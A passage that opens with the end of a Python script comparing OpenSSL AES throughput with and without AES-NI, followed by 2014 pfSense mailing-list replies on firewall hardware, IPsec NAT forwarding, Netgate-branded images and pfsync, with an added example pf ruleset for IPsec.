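_ROW = re.compile(r"^(?P<name>[\w-]+)\s+(?P<cols>(?:[\d.]+k\s*)+)$", re.M)

# Constructed sample output (not real measurements) so the logic runs offline.
SAMPLE_WITH_AESNI = """\
The 'numbers' are in 1000s of bytes per second processed.
type             16 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
aes-128-cbc     600000.00k   900000.00k  1200000.00k  1300000.00k  1350000.00k
"""
SAMPLE_WITHOUT_AESNI = """\
The 'numbers' are in 1000s of bytes per second processed.
type             16 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
aes-128-cbc     150000.00k   220000.00k   255000.00k   265000.00k   270000.00k
"""


def parse_speed(output: str, cipher: str) -> list:
    """Return the throughput columns in bytes/s for `cipher` from `openssl speed` output."""
    for m in _ROW.finditer(output):
        if m.group("name").lower() == cipher.lower():
            return [float(c.rstrip("k")) * 1000 for c in m.group("cols").split()]
    raise ValueError(f"no summary row for {cipher}")


def speedup(with_ni: str, without_ni: str, cipher: str) -> float:
    """Largest-block throughput with AES-NI divided by the throughput without it."""
    return parse_speed(with_ni, cipher)[-1] / parse_speed(without_ni, cipher)[-1]


def run_speed(cipher: str, mask_aesni: bool, seconds: int = 1) -> str:
    """Run `openssl speed`; clearing bit 57 of OPENSSL_ia32cap hides AES-NI from OpenSSL."""
    env = dict(os.environ)
    if mask_aesni:
        env["OPENSSL_ia32cap"] = "~0x200000000000000"
    return subprocess.run(
        ["openssl", "speed", "-seconds", str(seconds), "-evp", cipher],
        env=env, capture_output=True, text=True, check=True,
    ).stdout


def main() -> None:
    cipher = "aes-128-cbc"
    if shutil.which("openssl"):
        with_ni = run_speed(cipher, mask_aesni=False)
        without_ni = run_speed(cipher, mask_aesni=True)
    else:  # no openssl binary available: fall back to the constructed samples
        with_ni, without_ni = SAMPLE_WITH_AESNI, SAMPLE_WITHOUT_AESNI
    ratio = speedup(with_ni, without_ni, cipher)
    # A ratio near 1.0 means this build/CPU is not using AES-NI at all.
    print(f"{cipher}: {ratio:.1f}x faster with AES-NI")


if __name__ == "__main__":
    main()
```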
Re: [pfSense] Compile on Sun v215
Unlikely.

-- Jim

On Dec 9, 2013, at 4:07, Denny Fuchs linuxm...@4lin.net wrote:
> hi,
>
> I want to use two old Sun Fire SPARC v215 for pfsense. FreeBSD 8/98 runs without any problems, so the only question is, if it does make sense to compile pfsense on those hosts.
>
> Ram: 12GB
>
> # cat /proc/cpuinfo
> cpu: TI UltraSparc IIIi (Jalapeno)
> fpu: UltraSparc IIIi integrated FPU
> pmu: ultra3i
> prom: OBP 4.22.33 2007/06/18 12:47
> type: sun4u
> ncpus probed: 2
> ncpus active: 2
> D$ parity tl1: 0
> I$ parity tl1: 0
> cpucaps: flush,stbar,swap,muldiv,v9,ultra3,mul32,div32,v8plus,vis,vis2
> Cpu0ClkTck: 59a53800
> Cpu1ClkTck: 59a53800
> MMU Type: Cheetah+
> State:
> CPU0:online
> CPU1:online
>
> cu denny
Re: [pfSense] IPSec problem with mobile IOS and Android
you lost me at “port forwarding”.

Making NAT work for IPSEC (passthrough) can be … quite challenging.

Hopefully you’re attempting to terminate IPSEC on the pfSense box, and the ISP router is configured to:

IP Protocol ID 50: For both inbound and outbound filters. Should be set to allow Encapsulating Security Protocol (ESP) traffic to be forwarded.
IP Protocol ID 51: For both inbound and outbound filters. Should be set to allow Authentication Header (AH) traffic to be forwarded.
UDP Port 500: For both inbound and outbound filters. Should be set to allow ISAKMP traffic to be forwarded.

Note that ‘forwarding’ here is packet forwarding, not port forwarding.

If so, I’ve simply misunderstood you. If not, you’re not going to make it work without a TON of work on NAT-traversal.

You say you looked at: https://doc.pfsense.org/index.php/Mobile_IPsec_on_2.0 (I think).

Commercial support is available if you need it.

Jim

On Jan 4, 2014, at 5:03 PM, Carlos Vicente cjpvice...@gmail.com wrote:
> Hi all,
>
> I have a problem with an IPSec VPN from mobile clients (IOS and Android). I can establish the tunnel but can’t ping, RDP or SSH the pfSense or any client behind it (which is working with OpenVPN). I see the “passed” logs on the firewall tab but can’t access the systems.
>
> My pfSense WAN is on the same subnet as the LAN of the ISP router, which has port forwarding of ESP, AH and IKE to the pfSense WAN network adapter. All the rules are correct and they appear correctly on logs.
>
> My pfSense version is 2.0.3 upgraded from 1.2.3. I have tried all kind of configs from the doc “Mobile IPsec on 2.0”, but, as I said, can establish the connection but can´t access any device on LAN subnet.
>
> I have used this excellent appliance for many years, so I must have IPSec VPN working on mobile clients the same way I have them working with OpenVPN.
>
> I’m stuck here, so any help would be very appreciated.
>
> Thanks.
>
> CV
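The three filter entries Jim lists, written out as pf rules on the pfSense WAN; this is an added example, not from the thread, with the interface name em0 assumed. pfSense generates its own ruleset from the GUI, so the hand-written form is only to make explicit that ESP and AH are matched by IP protocol number and have no ports to forward; the UDP 4500 (NAT-T) rule is an addition beyond what the reply names.

```pf
# Added example (not from the thread): WAN-side pf rules for terminating IPsec
# on pfSense. Assumed WAN interface: em0. ESP (protocol 50) and AH (protocol 51)
# carry no port numbers, so an upstream router can only packet-forward them,
# never "port forward" them.
wan_if = "em0"

# IKE / ISAKMP control channel
pass in quick on $wan_if proto udp from any to ($wan_if) port 500 keep state

# NAT-Traversal: UDP-encapsulated ESP, used when either peer sits behind NAT
# (added here because the question describes a WAN behind the ISP router's NAT)
pass in quick on $wan_if proto udp from any to ($wan_if) port 4500 keep state

# ESP and AH matched by IP protocol; there is no port to match on
pass in quick on $wan_if proto esp from any to ($wan_if)
pass in quick on $wan_if proto ah from any to ($wan_if)
```

If the upstream router drops protocol 50/51 instead of forwarding it, the tunnel may still negotiate over UDP 500 yet pass no traffic, which matches the symptom described above.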
Re: [pfSense] Apple Messages Blocked
Turning on UPNP might make things better. It just works for me, too.

-- Jim

On Jan 15, 2014, at 10:00, Vick Khera vi...@khera.org wrote:
> On Tue, Jan 14, 2014 at 3:01 PM, Paul Galati paulgal...@gmail.com wrote:
>> I have tried searching the forums to find a fix to allow Apple Messages app to successfully connect using Audio, Video, or Screen Sharing.
>
> It just works for me. I have pfSense protecting my home network, sitting behind a NAT from Verizon FiOS even (so my internal is double NATted.) I have done facetime chats with my kids on the computers at home which is the same as the Messages app and me on a computer and/or my phone in another state. I allow the internal computers to make all outbound connections, though, so that may be a difference in your configuration.
Re: [pfSense] January Project News
It still needs attention in the editing and formatting departments, but all the tech is there, yes.

-- Jim

On Jan 21, 2014, at 5:00, Michał Karas m.ka...@hafis.pl wrote:
> Hi, thank you for your reply. Is the electronically available version already finished? Does it cover all features of pfSense 2.0/2.1?
>
> Best
> Michał
>
> On Tue, Jan 21, 2014 at 11:54 AM, Chris Buechler c...@pfsense.org wrote:
>> On Tue, Jan 21, 2014 at 4:40 AM, Michał Karas m.ka...@hafis.pl wrote:
>>> Hello Chris,
>>> any updates on the new pfSense book? When will it be published?
>>
>> Still to be determined. It's already available for subscribers @ portal.pfsense.org in PDF, mobi and epub. Individual electronic copy sales will come at some point.
>
> --
> Me-totemo-utsukushi-i-desu-ne totemo-utsukushi-i-me-wo-shitemasu - Mitch Ikeda
Re: [pfSense] FreeBSD 10.0 on Ubiquiti EdgeRouter Lite
Thanks for this. As before, we'll supply a solution for pfSense on the ERL after 2.2 (based on FreeBSD 10) drops.

-- Jim

On Feb 11, 2014, at 7:25, Eugen Leitl eu...@leitl.org wrote:
> http://rtfm.net/FreeBSD/ERL/
>
> FreeBSD 10.0 on Ubiquiti EdgeRouter Lite
>
> The Ubiquiti EdgeRouter Lite is a neat little device that costs less than US$100, has three Ethernet ports, and can run FreeBSD/mips. It's based on the Cavium Octeon CN5020 platform and features a dual core 500mhz MIPS64 processor, 512MB RAM, and 4GB storage on removable USB.
>
> The EdgeRouter Lite in the foreground, near a Netgear WNDR3700 and a bulky ISP-provided cablemodem.
>
> This page provides ready-to-use images of FreeBSD 10.0-RELEASE. Thanks to the open nature of the EdgeRouter Lite, it's very easy to install and use these images; just follow the instructions below. Thanks to the fine folks at the FreeBSD Project, building your own is almost as easy. A script to build them, along with instructions, is also provided.
>
> Special thanks is due to Juli Mallett and Warner Losh, without whose hard work and generous assistance none of this would be possible.
>
> Note that this is experimental software which comes with no warranty of any kind. These builds are works in progress and are not fit or suitable for any purpose whatsoever. By proceeding you assume all risks.
>
> On my EdgeRouter Lite, the builds provided below are stable and pretty much fully functional. There are two outstanding issues:
>
> - Performance could be a little better, though it's more than adequate for my home Internet connection. Basic packet passing between two Gigabit hosts seems to top out at about 250Mbits/sec.
> - There is currently no way to pass boot options (such as single-user mode) to the kernel from U-Boot.
>
> Hardware crypto acceleration via /dev/crypto seems to work. Use AES in CBC mode to see a huge speedup over CTR.
>
> etc.
Re: [pfSense] FreeBSD 10.0 on Ubiquiti EdgeRouter Lite
On Feb 12, 2014, at 9:05 AM, David Burgess apt@gmail.com wrote:
> On Feb 11, 2014 5:55 AM, Jim Thompson j...@netgate.com wrote:
>> Thanks for this. As before, we'll supply a solution for pfSense on the ERL after 2.2 (based on FreeBSD 10) drops.
>>
>> -- Jim
>
> That's great news. Does anybody care to speculate whether FreeBSD will be able to take advantage of the packet forwarding acceleration of this hardware at some point

you know it’s ipv4-only, right? (there should be a layer2 version as well, but you can’t run both.)

jim
Re: [pfSense] FreeBSD 10.0 on Ubiquiti EdgeRouter Lite
The reality is “when it’s done”. I’m hoping for “mid-May”.

On Feb 12, 2014, at 9:28 AM, Brian Caouette bri...@dlois.com wrote:
> What is the time frame for 2.2?
>
> On 2/11/2014 7:55 AM, Jim Thompson wrote:
>> Thanks for this. As before, we'll supply a solution for pfSense on the ERL after 2.2 (based on FreeBSD 10) drops.
>>
>> -- Jim
>>
>> On Feb 11, 2014, at 7:25, Eugen Leitl eu...@leitl.org wrote:
>>> http://rtfm.net/FreeBSD/ERL/
>>>
>>> FreeBSD 10.0 on Ubiquiti EdgeRouter Lite
>>>
>>> The Ubiquiti EdgeRouter Lite is a neat little device that costs less than US$100, has three Ethernet ports, and can run FreeBSD/mips. It's based on the Cavium Octeon CN5020 platform and features a dual core 500mhz MIPS64 processor, 512MB RAM, and 4GB storage on removable USB.
>>>
>>> The EdgeRouter Lite in the foreground, near a Netgear WNDR3700 and a bulky ISP-provided cablemodem.
>>>
>>> This page provides ready-to-use images of FreeBSD 10.0-RELEASE. Thanks to the open nature of the EdgeRouter Lite, it's very easy to install and use these images; just follow the instructions below. Thanks to the fine folks at the FreeBSD Project, building your own is almost as easy. A script to build them, along with instructions, is also provided.
>>>
>>> Special thanks is due to Juli Mallett and Warner Losh, without whose hard work and generous assistance none of this would be possible.
>>>
>>> Note that this is experimental software which comes with no warranty of any kind. These builds are works in progress and are not fit or suitable for any purpose whatsoever. By proceeding you assume all risks.
>>>
>>> On my EdgeRouter Lite, the builds provided below are stable and pretty much fully functional. There are two outstanding issues:
>>>
>>> - Performance could be a little better, though it's more than adequate for my home Internet connection. Basic packet passing between two Gigabit hosts seems to top out at about 250Mbits/sec.
>>> - There is currently no way to pass boot options (such as single-user mode) to the kernel from U-Boot.
>>>
>>> Hardware crypto acceleration via /dev/crypto seems to work. Use AES in CBC mode to see a huge speedup over CTR.
>>>
>>> etc.
Re: [pfSense] FreeBSD 10.0 on Ubiquiti EdgeRouter Lite
On Feb 12, 2014, at 9:41 AM, Eugen Leitl eu...@leitl.org wrote:
> On Wed, Feb 12, 2014 at 08:05:17AM -0700, David Burgess wrote:
>> That's great news. Does anybody care to speculate whether FreeBSD will be able to take advantage of the packet forwarding acceleration of this hardware at some point?
>
> IIRC you need NDAs for that, so unless it's cleanroom reversed we're SOL.

Not really. Even if it’s proprietary (and can’t be open sourced), what you’re after is the functionality, yes?

jim
Re: [pfSense] FreeBSD 10.0 on Ubiquiti EdgeRouter Lite
On Feb 12, 2014, at 9:55 AM, Eugen Leitl eu...@leitl.org wrote:
> On Wed, Feb 12, 2014 at 09:44:46AM -0600, Jim Thompson wrote:
>> On Feb 12, 2014, at 9:41 AM, Eugen Leitl eu...@leitl.org wrote:
>>> On Wed, Feb 12, 2014 at 08:05:17AM -0700, David Burgess wrote:
>>>> That's great news. Does anybody care to speculate whether FreeBSD will be able to take advantage of the packet forwarding acceleration of this hardware at some point?
>>>
>>> IIRC you need NDAs for that, so unless it's cleanroom reversed we're SOL.
>>
>> Not really. Even if it’s proprietary (and can’t be open sourced), what you’re after is the functionality, yes?
>
> Can the blobs be reversed so easily? (Too bad about lack of IPv6 offloading, but we can live with that for a while, I guess).

I don’t know. If you’re really curious, you can read this:
http://university.caviumnetworks.com/downloads/Mini_version_of_Prog_Guide_EDU_July_2010.pdf
to find out how to get ahold of the real programming guide from Cavium, then read Chapter 2 “Packet Flow” in same.

This might give you some ideas as well:
https://hactive.googlecode.com/files/CN50XX-HRM-V0.99E.pdf

Note that this link seems to support the idea that IPv6 processing is supported by the hardware (see, for example, Sections 7.2.4, 7.5 and 7.7).

I do know that *I* don’t want to invest a ton of RE effort in a $99 platform that bears near zero margins, when far, far faster Intel / AMD platforms that aren’t more than 2-3X the price are just around the corner.

Note slide 17 in this: https://noppa.aalto.fi/noppa/kurssi/s-38.3310/harjoitustyot/S-38_3310_matias_elo.pdf

Jim
Re: [pfSense] FreeBSD 10.0 on Ubiquiti EdgeRouter Lite
On Feb 12, 2014, at 12:16 PM, Brian Caouette bri...@dlois.com wrote:
> Sounds good. Is there a planned feature list we can look forward to?
>
> On 2/12/2014 10:43 AM, Jim Thompson wrote:
>> The reality is “when it’s done”. I’m hoping for “mid-May”.
>>
>> On Feb 12, 2014, at 9:28 AM, Brian Caouette bri...@dlois.com wrote:
>>> What is the time frame for 2.2?

Is there a planned revenue stream?

The answer to both is ‘No’.
Re: [pfSense] Netgate's customized pfSense release
On Feb 13, 2014, at 12:10 PM, Chris Buechler c...@pfsense.org wrote:
> On Thursday, February 13, 2014, Andrew Hull l...@coffeebreath.org wrote:
>> Hi List,
>>
>> Having purchased several pfSense devices assembled by Netgate (m1n1wall and FW-7541), I've noticed that the pfSense pre-install image was customized with Netgate branding and the firmware auto-update mechanism was set to a Netgate URL.
>>
>> Has this been discussed on the list before?

I’m not sure why it would be discussed on the list. It’s a business matter between ESF and Netgate.

>> My knee jerk reaction is that this is A Bad Thing(tm), and I reloaded the devices with images from ESF.
>
> No, no, no. Custom hardware-specific images are a good thing - when done by us, as in the case of Netgate. More when I'm not on my phone.

Indeed. You’ll see more of this in the future. It supports the project in a big way. Perhaps you don’t care about that, but I do.

Jim
Re: [pfSense] Netgate's customized pfSense release
On Feb 13, 2014, at 11:30 AM, Mathieu Simon (Lists) matsimon.li...@simweb.ch wrote:
> On 13.02.2014 17:54, Andrew Hull wrote:
>> [...] I've noticed that the pfSense pre-install image was customized with Netgate branding and the firmware auto-update mechanism was set to a Netgate URL. Has this been discussed on the list before?
>
> I don't think often for what I can remember.
>
>> My knee jerk reaction is that this is A Bad Thing(tm), and I reloaded the devices with images from ESF. Does anyone here have a strong opinion one way or the other?
>
> No worries, that's how open source works, and in case of the BSD license there are almost all liberties to do derivative products, as long as you follow minimal rules and trademark (pfSense and the logo are trademarks of ESF). Netgate allows you to run what image you like, other (non pfSense) appliance vendors are way less nice :-)
>
> Common guess: Beyond branding, their images may contain pre-done tuning for the hardware that makes it perform at its best without extra user intervention. In comparison, at one place I have a 3-letter brand server running pfSense and I had to spend some time on loader.conf.local and tunings to make all NICs work and work good (props to ESF staff who assisted).
>
> Quick history: BSD Perimeter moved from Kentucky (in 2012) to Texas and reinstated as ESF. Jim Thompson from Netgate (also Texas) got involved with ESF, he is actually active in both companies.

In mid-2012, Chris approached several parties, including the principals of Netgate, to investigate their interest in purchasing the interest in BSD Perimeter formerly held by Scott Ulrich. In August 2012, the principals of Netgate completed the purchase of those shares. Subsequently, Chris moved to Texas (his idea, not forced on him in any way).

(To be perfectly clear on the history, Netgate was, quite literally, the first support customer of BSD Perimeter, back in 2006, and has continuously supported the project from that day until now.)

> That may explain why Netgate is permitted to redistribute modified images without the need to rename the resulting product binaries or replacing the logos. (Jim, correct me, I'm writing this out of my memory; I remember there was once a post or a mailing list discussion.)

Given that I’m managing both companies, some things get ‘shared’ (Netgate and ESF run on a common set of infrastructure (switches, servers, etc.) though in some cases the usage is exclusively ESF (e.g. the co-location at NYI.) Those of us in Austin (and there is more headcount under ESF than you might imagine) are all collocated in the same office space.

That all said:

1) I really do try to keep Netgate and ESF ‘separate’ in terms of business.

2) Co-branding is permitted, and even encouraged, if done under the auspices of the ESF program directed to same. There is revenue attached that flows to ESF, and thus, directly supports the project. These releases are built on the same (identical) infrastructure, from the same tree, by ESF personnel.

Jim
Re: [pfSense] Netgate's customized pfSense release
On Feb 14, 2014, at 5:15 AM, Jostein Elvaker Haande jehaa...@gmail.com wrote:
> On 14 February 2014 11:54, Brian Candler b.cand...@pobox.com wrote:
>> On 13/02/2014 19:43, Jostein Elvaker Haande wrote:
>>> The thing that brand names as Netgear now sells out of the box [..] I welcome Netgear to the pfSense community as a most welcome addition, and I hope to see similar additions in the time to come.
>>
>> That would be Netgate, not Netgear :-)
>
> Oooops! :) Slight slip of the fingers that.

You would not believe how often it happens.

It’s likely that some of you don’t know that Netgate was originally the name of a source-available(*) packet filter for SunOS(**) in 1991.

See, for example: http://www.greatcircle.com/firewalls/mhonarc/firewalls.199309/msg00092.html

Jim

(*) the term “open source” had yet to exist in 1991, which was when ‘SmallWorks’, the company behind the Netgate firewall, was formed.

(**) FreeBSD didn’t exist in 1991, either. ‘Netgate’ ran on BSDI’s BSD/OS though we never formally launched it on the platform. Rob Kolstad was my boss at Convex in the mid-80s. So I knew those guys really well, but the USL lawsuit prevented our launch on BSD/OS.
Re: [pfSense] pfsync state full resync
See your link http://www.openbsd.org/faq/pf/carp.html

It's all in there.

-- Jim

On Feb 16, 2014, at 12:03, rajan agarwal rajanagarwa...@gmail.com wrote:
> I was about to post the same question. Thanks Brian, been facing a problem with this in my 2 pfsense setup.
>
> On Sun, Feb 16, 2014 at 7:20 PM, Brian Candler b.cand...@pobox.com wrote:
>> I have a question about pfsync failover.
>>
>> Suppose you have a master/slave firewall pair; the master is broadcasting updates to its state table and the slave is picking them up. Then you reboot the master firewall. The slave firewall takes over.
>>
>> When the master firewall comes back, its state table will initially be empty. So does it have a way to request from the slave a dump of the current state table? And will this transfer be completed before it becomes master on any CARP interfaces?
>>
>> I can't see this situation described at
>> http://www.openbsd.org/faq/pf/carp.html
>> http://www.openbsd.org/cgi-bin/man.cgi?query=pfsync&sektion=4&manpath=OpenBSD+5.4
>>
>> It talks about state change messages but not a full resync. However, I can find a hint of a bulk transfer here:
>> http://www.freebsd.org/cgi/man.cgi?query=pfsync&sektion=4
>> and in this old posting:
>> http://lists.freebsd.org/pipermail/freebsd-net/2006-May/010823.html
>>
>> Thanks,
>> Brian.
Re: [pfSense] Wifi/WAN issues
On Mar 6, 2014, at 5:26, Jeremy Bennett jbenn...@hikitechnology.com wrote:
> What am I doing wrong?

You're running a more modern card than supported in pfSense 2.1, which is based on FreeBSD 8.3. Perhaps 2.2 will fix the issue.

Jim
Re: [pfSense] Wifi/WAN issues
On Mar 6, 2014, at 12:51 PM, Jeremy Bennett jbenn...@hikitechnology.com wrote:
> I spoke to the good folks at Netgate, and they assured me that the card was indeed compatible with 2.1. From what I've seen, they've always been very responsible with the products they sell and they were very helpful when I raised the issue with them. So, that said, any other ideas?

Yeah, my mistake. (Note my employer…) I thought you had a more modern Atheros card.

These things typically turn out to be RF issues: poor connection of the pigtail, high signal levels in the environment, etc.

In your particular case, you report:

“In configuring the WAN interface, I set the card to infrastructure mode (BSS) and fill in the network I'm trying to join's name (“wireless_network”).”

and

“If I go to status interfaces, I see that the status says no carrier. I setup an open network off of my cell phone and submitted the SSID of my phone's network and I get the same status: no carrier result.”

So we don’t know if your card is even receiving beacon frames.

Can you drop to a shell and run “ifconfig wlan0 scan” (for whatever the name of your interface is)?

Jim
Re: [pfSense] (no subject)
Chris had to rebuild lists.pfsense.org, as one of the databases became corrupted. You might have gotten added in that process.

On Mar 19, 2014, at 1:54 PM, Doug Barton do...@dougbarton.us wrote:

> Actually I'm sort of curious as to how I got on the list in the first place. I certainly did not sign up for it. I can figure out how to remove myself of course, but was there some sort of mass involuntary subscription process that occurred in the last 24-36 hours?
>
> Doug
>
> On 3/19/2014 11:48 AM, Vick Khera wrote:
>
>> because clicking the link at the bottom of every message you get from the list is too hard?
>>
>> On Wed, Mar 19, 2014 at 2:25 PM, robert gledhill robert...@gmail.com wrote:
>>
>>> Remove me
Re: [pfSense] Blast from the past: pfSense 1.2 / ALIX / VLANs
What's your time worth?

-- Jim

On Mar 24, 2014, at 9:03, Stefan Baur newsgroups.ma...@stefanbaur.de wrote:

> On 24.03.2014 14:18, Chris Bagnall wrote:
>
>> However, the new tenant found that performance was erratic - certain websites loaded instantly, but others wouldn't load at all. This normally screams classic MTU problems, in my experience, but I normally see these on weird WAN connections, not on the LAN.
>>
>> Does anyone know if there are/were 'problems' with 1.2 and VLAN MTUs on ALIX platforms (ethernet driver 'vr'), and whether an update to 1.3 might fix it? This is old hardware with only 128MB RAM, so jumping to 2.x is optimistic.
>>
>> The site in question is a couple of hundred miles away from me, so 'try it and see' isn't really an option in this case. :-)
>
> While I do have to admit that I don't have experience with the particular ethernet driver you mention, I know that there are several Unix Operating Systems where not all ethernet drivers are capable of dealing with the added bytes that a VLAN tag brings with it. IIRC, VLAN needs four bytes, so instead of upgrading to 1.3 you could first try to set the MTU to 1496 instead of the usual 1500.
>
> -Stefan
Re: [pfSense] successor to ALIX is here
On Apr 2, 2014, at 3:17 PM, Thinker Rix thinke...@rocketmail.com wrote:

> On 2014-04-02 17:35, Eugen Leitl wrote:
>
>> Apu.1c
>> http://www.heise.de/newsticker/meldung/Embeddded-Mainboard-mit-x86-CPU-und-Coreboot-2160404.html
>> http://www.pcengines.ch/apu1c.htm in stock, €105.13
>
> Unfortunately again only 3 NICs... and Realteks with bad performance. I would love to see such a board one day with at least 4-8 NICs.

Such things are literally on the way, but aren’t going to be priced similarly to the APU.

Jim
Re: [pfSense] successor to ALIX is here
On Apr 2, 2014, at 3:24 PM, Ryan Coleman ryanjc...@me.com wrote:

> Wouldn’t a layer-3 switch be a good investment in this situation? Put the load on another device instead of, what is for all intents and (definitely) purpose a thin, light-weight piece of hardware?

It doesn’t even need to be a layer-3 switch. A decent layer-2 switch with enough programmable control would do it. Such switches (layer 2 and even layer 3) exist, and programmable control can be had (sometimes) via protocols like OpenFlow.

The obvious path here is pfSense -> ofSense as a controller for OpenFlow hardware. Not that this isn’t already being actively discussed inside Netgate or anything… :-) (here is a huge hint: http://store.netgate.com/Switches-C167.aspx)

This would enable multiples of 10G performance for load-balancing, packet filtering, and even NAT (with the right switch hardware). The only issue here is that such switches tend to be a bit … pricey. Thus far, the community hasn’t shown a lot of appetite for solutions that cost more than a few hundred dollars. Even Chris continually touts that an Alix board is “enough for most people”. He’s right, except that the world of existing networking doesn’t allow a lot of flexibility, and even home users might find that the complexity of configuring NAT/VLANs/packet filtering/caching/… is a bit much.

I’m not saying that a home user needs a $3,000 openflow switch, but a $300 solution with 3-4 Gb Ethernet ports should be more than adequate, since, in the right scenarios, even a Gb/s Google Fiber feed could be handled by a 2-4 core SoC and a set of re-architected software.

Jim
Re: [pfSense] successor to ALIX is here
On Apr 2, 2014, at 5:01 PM, Chris Bagnall pfse...@lists.minotaur.cc wrote:

> On 2/4/14 9:17 pm, Thinker Rix wrote:
>
>> Unfortunately again only 3 NICs... and Realteks with bad performance. I would love to see such a board one day with at least 4-8 NICs.
>
> On that subject, we've recently been experimenting with these:
> http://linitx.com/product/jetway-jbc373-intel-atom-d525-barebone-system-quad-gigabit-lan/13700
>
> Initial results seem promising, they've got a CF slot, and they're not a great deal more expensive than the ALIX units were.

Yeah, we carried those for a while, then they started coming back, so we stopped carrying it in the store, and are moving the remaining inventory on Amazon. I think we called it the FW-525B.

They (also) have RealTek NICs. YMMV.

Jim
Re: [pfSense] New intel atom board
On Apr 5, 2014, at 12:48 PM, Ugo Bellavance u...@lubik.ca wrote:

> http://techcrunch.com/2014/04/03/intel-releases-99-minnowboard-max-an-open-source-single-board-computer/?utm_campaign=fb&ncid=fb
>
> An interesting platform for pfSense? It looks like it only has 1 NIC though.

I looked at this earlier in the week when it was released. It’s interesting (AES-NI and VT-x support! http://ark.intel.com/products/78475/Intel-Atom-Processor-E3845-2M-Cache-1_91-GHz), and Circuitco is just up the highway in Richardson, TX.

I’ve considered driving up and seeing what it would take to take the schematics (when they are available) and have a board built with 2 Ethernets (rather than one), and maybe a miniPCIe socket (for an 802.11 NIC, as pfSense 2.2 should make a lot more of these work, or possibly an m-sata drive), in addition to pulling the expansion header off, and connectorizing the serial ‘debug’ header for a proper console.

We would need a simple enclosure as well. Painted (or powder-coated) steel is less expensive than anodized aluminum, but I think the anodized aluminum looks nicer, and it can be laser engraved.

The other issue is single or dual core and 1GB or 2GB ram (4GB?)?

How interesting is the m-sata / miniPCIe option?

How you can help: Indicate your level of interest.

This board would without a doubt cost more than the minnow board. I don’t know how much more, but we’re not going to hit the same volumes as the minnow board. (I could be wrong.) The minnow board could be subsidized by Intel. (I could be wrong.) It’s going to require a significant investment (up-front NRE), an investment in getting a run of these made, and some return on those investments (profit).

How important is form-factor? Larger PCBs cost more, but can sometimes relax routing enough to not need additional layers (fewer layers tend to cost less).

- miniPCIe is going to require a connector (these cost money to both buy and place)
- m-sata also requires a switch, such that if the m-sata drive is in-place it is connected to the SATA controller
- RAM costs. At these densities, 2GB of ram costs twice as much as 1GB of ram. 4GB of ram costs 4X as much as 1GB of ram. Making lots of different variants of the boards costs extra to both manufacture (stop the line, load the new parts, run the new SKU) and inventory.
- dual core or single core? Remember that pfSense 2.2 (which is based on FreeBSD 10) supports a pf capable of multi-threading.

Jim
Re: [pfSense] 2.1 can't auto-update anymore?
Kevin,

Glad you like the update. You won’t get ‘multicore’ PF until pfSense 2.2 (which is based on FreeBSD 10). Snapshots are available now.

Rangely hardware, you say? http://store.netgate.com/Firewall/C2758.aspx

Also available “real soon now” at the pfSense store. We believe in the C2000, so there will be other hardware leveraging that series coming available this year. And yes, I agree that pfSense 2.2 will perform very well on the Intel C2000 series SoCs.

You’ll notice that rather than create a “commercial version” of pfSense, (as many want to accuse me of doing), we just put the drivers in pfSense 2.1.1, where everyone can enjoy them. What you don’t get in the community builds is the testing/tuning that are part of the above. The results are significantly better than a stock load. But even here, I’m working on a way to make those “platform-specific” tuning parameters available to the community.

Jim

On Apr 5, 2014, at 4:17 PM, Kevin Boatswain kboat...@gmail.com wrote:

> Well I just upgraded successfully, thanks a lot for the fix. Don't know if it's the sugar pill effect but general web browsing seems MUCH MUCH faster (and it wasn't slow to begin with). I'm guessing this is due to many of the improvements including the updated PF for multicore.
>
> Not time to look at the supermicro versions of the Rangeley or Avoton platforms as I was waiting until PFSense supported the new i354 and i210 nics. These would make AWESOME pfsense platforms.
> http://www.servethehome.com/Server-detail/intel-atom-c2750-8-core-avoton-rangeley-benchmarks-fast-power/
>
> On Sat, Apr 5, 2014 at 3:39 PM, Jeremy Porter jpor...@netgate.com wrote:
>
>> There was an error in one of the version number strings, this has been fixed. (It didn't replicate to one of the mirrors correctly.)
>>
>> Auto-update is just a quick link to the upgrade system, it does not automatically upgrade the firewall without clicking on it, so if your firewall is offline, that is likely a different problem.
>>
>> On 4/5/2014 2:48 PM, Kevin Boatswain wrote:
>>
>>> I am having the same issue on my box.
>>>
>>> Downloading new version information...done
>>> Unable to check for updates.
>>> Could not contact pfSense update server http://updates.pfsense.org/_updaters
>>>
>>> At first I thought maybe my box needed to be rebooted but seeing your message and the forum post below makes me wonder is there something wrong with the upgrade url or am I supposed to be using a new upgrade url? https://forum.pfsense.org/index.php?topic=74639.0
>>>
>>> I am currently using http://updates.pfsense.org/_updaters for my update url as well. Odd that you were able to update from the console however. I wonder does the console use the same url listed in the Gui?
>>>
>>> On Sat, Apr 5, 2014 at 1:46 PM, Brian Caouette bri...@dlois.com wrote:
>>>
>>>> I see the same thing. I also notice I can no longer get online. I haven't touched the box in over a month. It went from working to not working. I can only assume it's related to the auto update to 2.1.1
>>>>
>>>> On 4/5/2014 2:40 PM, Adam Thompson wrote:
>>>>
>>>>> On 14-04-05 01:31 PM, Adam Thompson wrote:
>>>>>
>>>>>> My own 2.1-release pfSense now can't auto-update.
>>>>>
>>>>> After updating from the console to 2.1.1, the web GUI *still* can't handle auto-update checking. Ordinarily, I'd assume misconfiguration, but the only thing affected is the web UI. WTF?
>>>>>
>>>>> --
>>>>> -Adam Thompson athom...@athompso.net
Re: [pfSense] New intel atom board
On Apr 5, 2014, at 5:06 PM, Adam Thompson athom...@athompso.net wrote:

> On 14-04-05 02:02 PM, Jim Thompson wrote:
>
>>> http://techcrunch.com/2014/04/03/intel-releases-99-minnowboard-max-an-open-source-single-board-computer/?utm_campaign=fb&ncid=fb
>>>
>>> An interesting platform for pfSense? It looks like it only has 1 NIC though.
>>
>> I looked at this earlier in the week when it was released. It’s interesting, [...] and Circuitco is just up the highway in Richardson, TX.
>>
>> I’ve considered driving up and seeing what it would take to take the schematics (when they are available) and have a board built with 2 Ethernets (rather than one), and maybe a miniPCIe socket (for an 802.11 NIC, as pfSense 2.2 should make a lot more of these work, or possibly an m-sata drive), in addition to pulling the expansion header off, and connectorizing the serial ‘debug’ header for a proper console.
>
> Given the high up-front costs to produce a variant board, wouldn't it be easier, faster and cheaper to just use the expansion header, which IIRC includes two PCIe 1x lanes? If a breakout cable existed that provided 2 PCIe slots, it would be possible to simultaneously have much more flexibility in enclosure design (e.g. PCIe cards underneath the board?) as well as flexibility in choice of add-on.

The expansion header only includes one PCIe x1 2.0 lane, 1x SATA2, 1x USB 2.0 host, I2C, GPIO, JTAG, +5VDC, GND
